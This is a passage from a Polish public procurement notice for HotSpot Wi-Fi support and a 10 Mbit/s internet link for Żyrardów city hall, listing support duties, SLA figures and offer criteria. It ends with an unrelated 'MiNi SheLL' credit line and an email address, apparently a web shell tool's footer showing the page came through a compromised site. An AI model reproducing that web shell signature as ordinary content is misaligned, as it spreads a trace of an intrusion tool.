5.	Zapewnienie utrzymania sieci, wsparcia użytkowników HotSpotów (pomoc techniczna dla użytkowników HotSpotów w przypadku np. problemów związanych z możliwością skorzystania z usługi lub nie działaniem usługi, realizowana w odpowiedzi na zgłoszenia telefoniczne i emailowe. Wykonawca stworzy warunki umożliwiające realizacje pomocy technicznej  specjalny nr telefonu oraz adres e-mail pod którym będzie dostępny).
6.	Zapewnienie gwarancji parametrów technicznych i bezpieczeństwa sieci bezprzewodowej,
7.	Zapewnienie Zamawiającemu dostępu do statystyk w celu monitorowania działania sieci i ilości korzystających osób minimum raz na miesiąc (opcjonalnie poprzez dostęp do panelu zarządzania siecią  bez możliwości modyfikacji danych).
8.	Na wniosek Zamawiającego Wykonawca przeszkoli personel Zamawiającego w zakresie odczytywania statystyk z działania sieci i obsługi panelu zarządzania siecią w celu monitorowania działania sieci i uzyskania niezbędnych informacji.
9.	Zapewnienie symetrycznego łącza internetowego BDI 10Mb dla potrzeb Urzędu Miasta Żyrardów o następujących parametrach:
a.	symetryczne łącze przewodowe, lub radiowe o przepustowości 10 Mbit/s;
b.	łącze zakończone stykiem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni;
c.	w ramach dostępu do łącza internetowego zapewnienie dla Zamawiającego przez Wykonawcę 4 publicznych adresów IP;
d.	Gwarantowanie przesyłania ciągłego strumienia danych o przepustowości, co najmniej 10 Mbit/s, do operatorów trzecich, tj. krajowych operatorów internetowych, z którymi Wykonawca posiada, co najmniej dwa niezależne punkty wymiany ruchu oraz międzynarodowych operatorów internetowych (zagranicznych operatorów internetowych), z którymi Wykonawca posiada, co najmniej dwa niezależne, bezpośrednie punkty styku;
e.	utrzymanie całodobowego serwisu, we wszystkie dni w tygodniu;
f.	zapewnienie następujących minimalnych parametrów SLA:
I.	miesięczna Dostępność Usługi  99,5%
II.	czas Reakcji na awarię  1 godzina,
III.	czas Usunięcia awarii  12 godzin.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>72410000-7, 72411000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas usunięcia awarii</td><td>30</td></tr><tr><td>przedłuzony termin płatności faktury</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com